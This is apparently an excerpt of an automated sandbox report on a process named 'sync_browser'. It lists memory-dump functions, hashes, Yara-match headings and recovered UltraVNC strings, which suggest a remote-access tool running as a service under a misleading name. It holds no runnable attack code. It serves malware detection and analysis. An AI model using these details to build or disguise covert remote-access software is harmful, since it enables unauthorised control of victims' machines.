                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                      • API String ID: 1063416079-2438250478
                                                                      • Opcode ID: 35055a67cd95e2491fb3900131c2109903ea622cf7e3b396c5ad9548882c2784
                                                                      • Instruction ID: 3aefd172c6d9fa848a1d221c951ad64645aa95ee54edce5966a654c9cd27e8fe
                                                                      • Opcode Fuzzy Hash: 35055a67cd95e2491fb3900131c2109903ea622cf7e3b396c5ad9548882c2784
                                                                      • Instruction Fuzzy Hash: 5EA1A226704A9584EB50EB3AD4643AD6361FB84FA8F548332EE2E977E9DF38C445C311
                                                                      APIs
                                                                      Strings
                                                                      • i, xrefs: 00007FF7E509A754
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF7E509A5D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                                      • API String ID: 3168844106-2727237473
                                                                      • Opcode ID: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                      • Instruction ID: fb7fde83c8fa77ce3b4910d25e1d711d15f10e8e153aa1890401d4c841c165e6
                                                                      • Opcode Fuzzy Hash: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                      • Instruction Fuzzy Hash: 276125227087C995E774AF29A5143BAA7A0FB86B54F840136EE9D837C9DF3CD484C712
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                                      • String ID:
                                                                      • API String ID: 3786353176-0
                                                                      APIs
                                                                      • malloc.LIBCMT ref: 00007FF7E507C5D4
                                                                        • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
                                                                        • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
                                                                        • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$AllocHeap_callnewhmalloc
                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
                                                                      • API String ID: 908589684-1814909704
                                                                      APIs
                                                                      • Sleep.KERNEL32 ref: 00007FF7E5087720
                                                                        • Part of subcall function 00007FF7E5087A30: SetEvent.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A4B
                                                                        • Part of subcall function 00007FF7E5087A30: SetEvent.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A55
                                                                        • Part of subcall function 00007FF7E5087A30: SetEvent.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A5F
                                                                        • Part of subcall function 00007FF7E5087A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A8B
                                                                        • Part of subcall function 00007FF7E5087A30: InitializeCriticalSection.KERNEL32(?,?,?,00007FF7E50876B4), ref: 00007FF7E5087A95
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Event$CriticalInitializeSection$Sleepmalloc
                                                                      • String ID: keyEvent$start_event$stop_event
                                                                      • API String ID: 367317321-1979648887
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                      • String ID: G
                                                                      • API String ID: 2834860089-985283518
                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2819658684-0
                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 948891078-0
                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Global$FreeUnlock
                                                                      • String ID:
                                                                      • API String ID: 1239146723-0
                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Write$ConsoleDebugFileHandleOutputString
                                                                      • String ID:
                                                                      • API String ID: 1934604790-0
                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _amsg_exit$_getptd_lockfree
                                                                      • String ID:
                                                                      • API String ID: 2148533958-0
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32 ref: 00007FF7E50992F0
                                                                        • Part of subcall function 00007FF7E5107520: EnterCriticalSection.KERNEL32 ref: 00007FF7E5107534
                                                                        • Part of subcall function 00007FF7E5107520: ReleaseSemaphore.KERNEL32 ref: 00007FF7E5107577
                                                                        • Part of subcall function 00007FF7E5107520: GetLastError.KERNEL32 ref: 00007FF7E5107581
                                                                        • Part of subcall function 00007FF7E5107520: LeaveCriticalSection.KERNEL32 ref: 00007FF7E510758C
                                                                        • Part of subcall function 00007FF7E5107400: EnterCriticalSection.KERNEL32 ref: 00007FF7E5107427
                                                                        • Part of subcall function 00007FF7E5107400: LeaveCriticalSection.KERNEL32 ref: 00007FF7E5107472
                                                                        • Part of subcall function 00007FF7E5107400: LeaveCriticalSection.KERNEL32 ref: 00007FF7E510747B
                                                                        • Part of subcall function 00007FF7E5107400: WaitForSingleObject.KERNEL32 ref: 00007FF7E510748A
                                                                        • Part of subcall function 00007FF7E5107400: EnterCriticalSection.KERNEL32 ref: 00007FF7E5107495
                                                                        • Part of subcall function 00007FF7E5107400: GetLastError.KERNEL32 ref: 00007FF7E51074A7
                                                                        • Part of subcall function 00007FF7E5107400: EnterCriticalSection.KERNEL32 ref: 00007FF7E51074DE
                                                                        • Part of subcall function 00007FF7E5107400: LeaveCriticalSection.KERNEL32 ref: 00007FF7E5107500
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                      • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                      APIs
                                                                      • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                      • String ID:
                                                                      APIs
                                                                      • API ID: CriticalSection$DeleteEnterEventLeave
                                                                      • String ID:
                                                                      APIs
                                                                      • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                      • String ID:
                                                                      APIs
                                                                      • API ID: Escape$Release
                                                                      • String ID:
                                                                      APIs
                                                                      • API ID: _amsg_exit_getptd$_lock
                                                                      • String ID:
                                                                      APIs
                                                                      Strings
                                                                      • API ID: htonl
                                                                      • String ID: .$.
                                                                      APIs
                                                                      Strings
                                                                      • API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
                                                                      • String ID: !UVNCDIR-
                                                                      APIs
                                                                      Strings
                                                                      • API ID: _errno_invalid_parameter_noinfo
                                                                      • String ID: B
                                                                      • API String ID: 2959964966-1255198513
                                                                      • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                      • Instruction ID: 44b67937f89b6ac4100d6c6f450662e3acf37ae9df5af6b3356ea9f259c688cd
                                                                      • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                      • Instruction Fuzzy Hash: 32318236A14659C8E711AF69B4506ACB7B4BB08BA8F980537EE1D93A8CCF38D441D721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo
                                                                      • String ID: SecureVNC;0;0x%08x;%s
                                                                      • API String ID: 2959964966-2465057312
                                                                      • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                      • Instruction ID: 30ee1f384ff6272b00ea2c56571f92cdd84f942b728b0f8982f0d88587519b66
                                                                      • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                      • Instruction Fuzzy Hash: 2B21E532B1471585E711EF61B4A46ACB6A4BB08BA8F960137EE5C93B8CCE79D401C351
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryFileModuleName
                                                                      • String ID: " -service
                                                                      • API String ID: 3981628254-877726483
                                                                      • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                      • Instruction ID: c171fa9a6c41e7981d2d472e2f4096ec598c175610e3d7adee4a95781747fb48
                                                                      • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                      • Instruction Fuzzy Hash: F231A2116087C584E731A724B8253BAB7A1FF89B50F844233D6AC876D9DE3CD114CB21
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileModuleNamePlaySound
                                                                      • String ID: ding_dong.wav
                                                                      • API String ID: 3032721342-215479118
                                                                      • Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                      • Instruction ID: 1d51ecafa9093cd4e44e3e194796428cfede6af165ca82165b5f3692750f2f28
                                                                      • Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                      • Instruction Fuzzy Hash: C411332571864991E724AB35F86136AA3A0FF48B60F905337EA6DC76D8DF3CD111CB11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                                      • String ID: <
                                                                      • API String ID: 2439412506-4251816714
                                                                      • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                      • Instruction ID: d7231441ead587427f14a6fedae5e0a55f4165667a1c4e693f6e6809eb020a36
                                                                      • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                      • Instruction Fuzzy Hash: 8011913261864586EB60DF12F4207AAB360FBC8B58F945032EB8D47B59CF3CD906CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo
                                                                      • String ID: I
                                                                      • API String ID: 2959964966-3707901625
                                                                      • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                      • Instruction ID: be986c4828670123726109108db2bdfa3b877074eb223cc5ccb988f37f9452ea
                                                                      • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                      • Instruction Fuzzy Hash: D911A072A08784C5EB10AB52B560369F7A4FB94FE0F584236EB9C87B99CF3CD5018B01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: getpeernameinet_ntoa
                                                                      • String ID: <unavailable>
                                                                      • API String ID: 1982201544-1096956887
                                                                      • Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                      • Instruction ID: a90c45a56e81e5088a33f48af6c9fceddb66256e22d5ce3188940cdf2e2712c1
                                                                      • Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                      • Instruction Fuzzy Hash: 3F01806261564982EF50AB24F46537AB3A0FB88F98F840432EA4E8B369DF3CD445CB11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$MappingOpenView
                                                                      • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                                      • API String ID: 3439327939-2897898322
                                                                      • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                      • Instruction ID: 45d873d660a1797f3bbac1211ec355855e3de034b2825a0c4702defe01bf2d63
                                                                      • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                      • Instruction Fuzzy Hash: 5A018E73508B9486E720DBA4F41176AB3A0FB88BA0F890336DA9A43B98DF7CD050C710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$MappingOpenView
                                                                      • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                      • API String ID: 3439327939-3305976270
                                                                      • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                      • Instruction ID: 00904e88e4dd01a527c5afa1778253c4e6dec4f05e8816c171b1e8153baee19a
                                                                      • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                      • Instruction Fuzzy Hash: 05018E33509BC486E720DB64F45136AF3A0FB84BA0F884235E69A42B98DF7CD450C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClassMessageNamePost
                                                                      • String ID: WindowsScreenSaverClass
                                                                      • API String ID: 650004062-352026012
                                                                      • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                      • Instruction ID: 99d3f02d0e566a33d64f380aedd898d00eaf16a5318d003f6a3bd61096d572d0
                                                                      • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                      • Instruction Fuzzy Hash: 0A014F35618F8981E7719B15F9607EAA390FB88B84F801132DA8C47B5CDE3CE155CB11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLastMapping
                                                                      • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                      • API String ID: 1790465270-3305976270
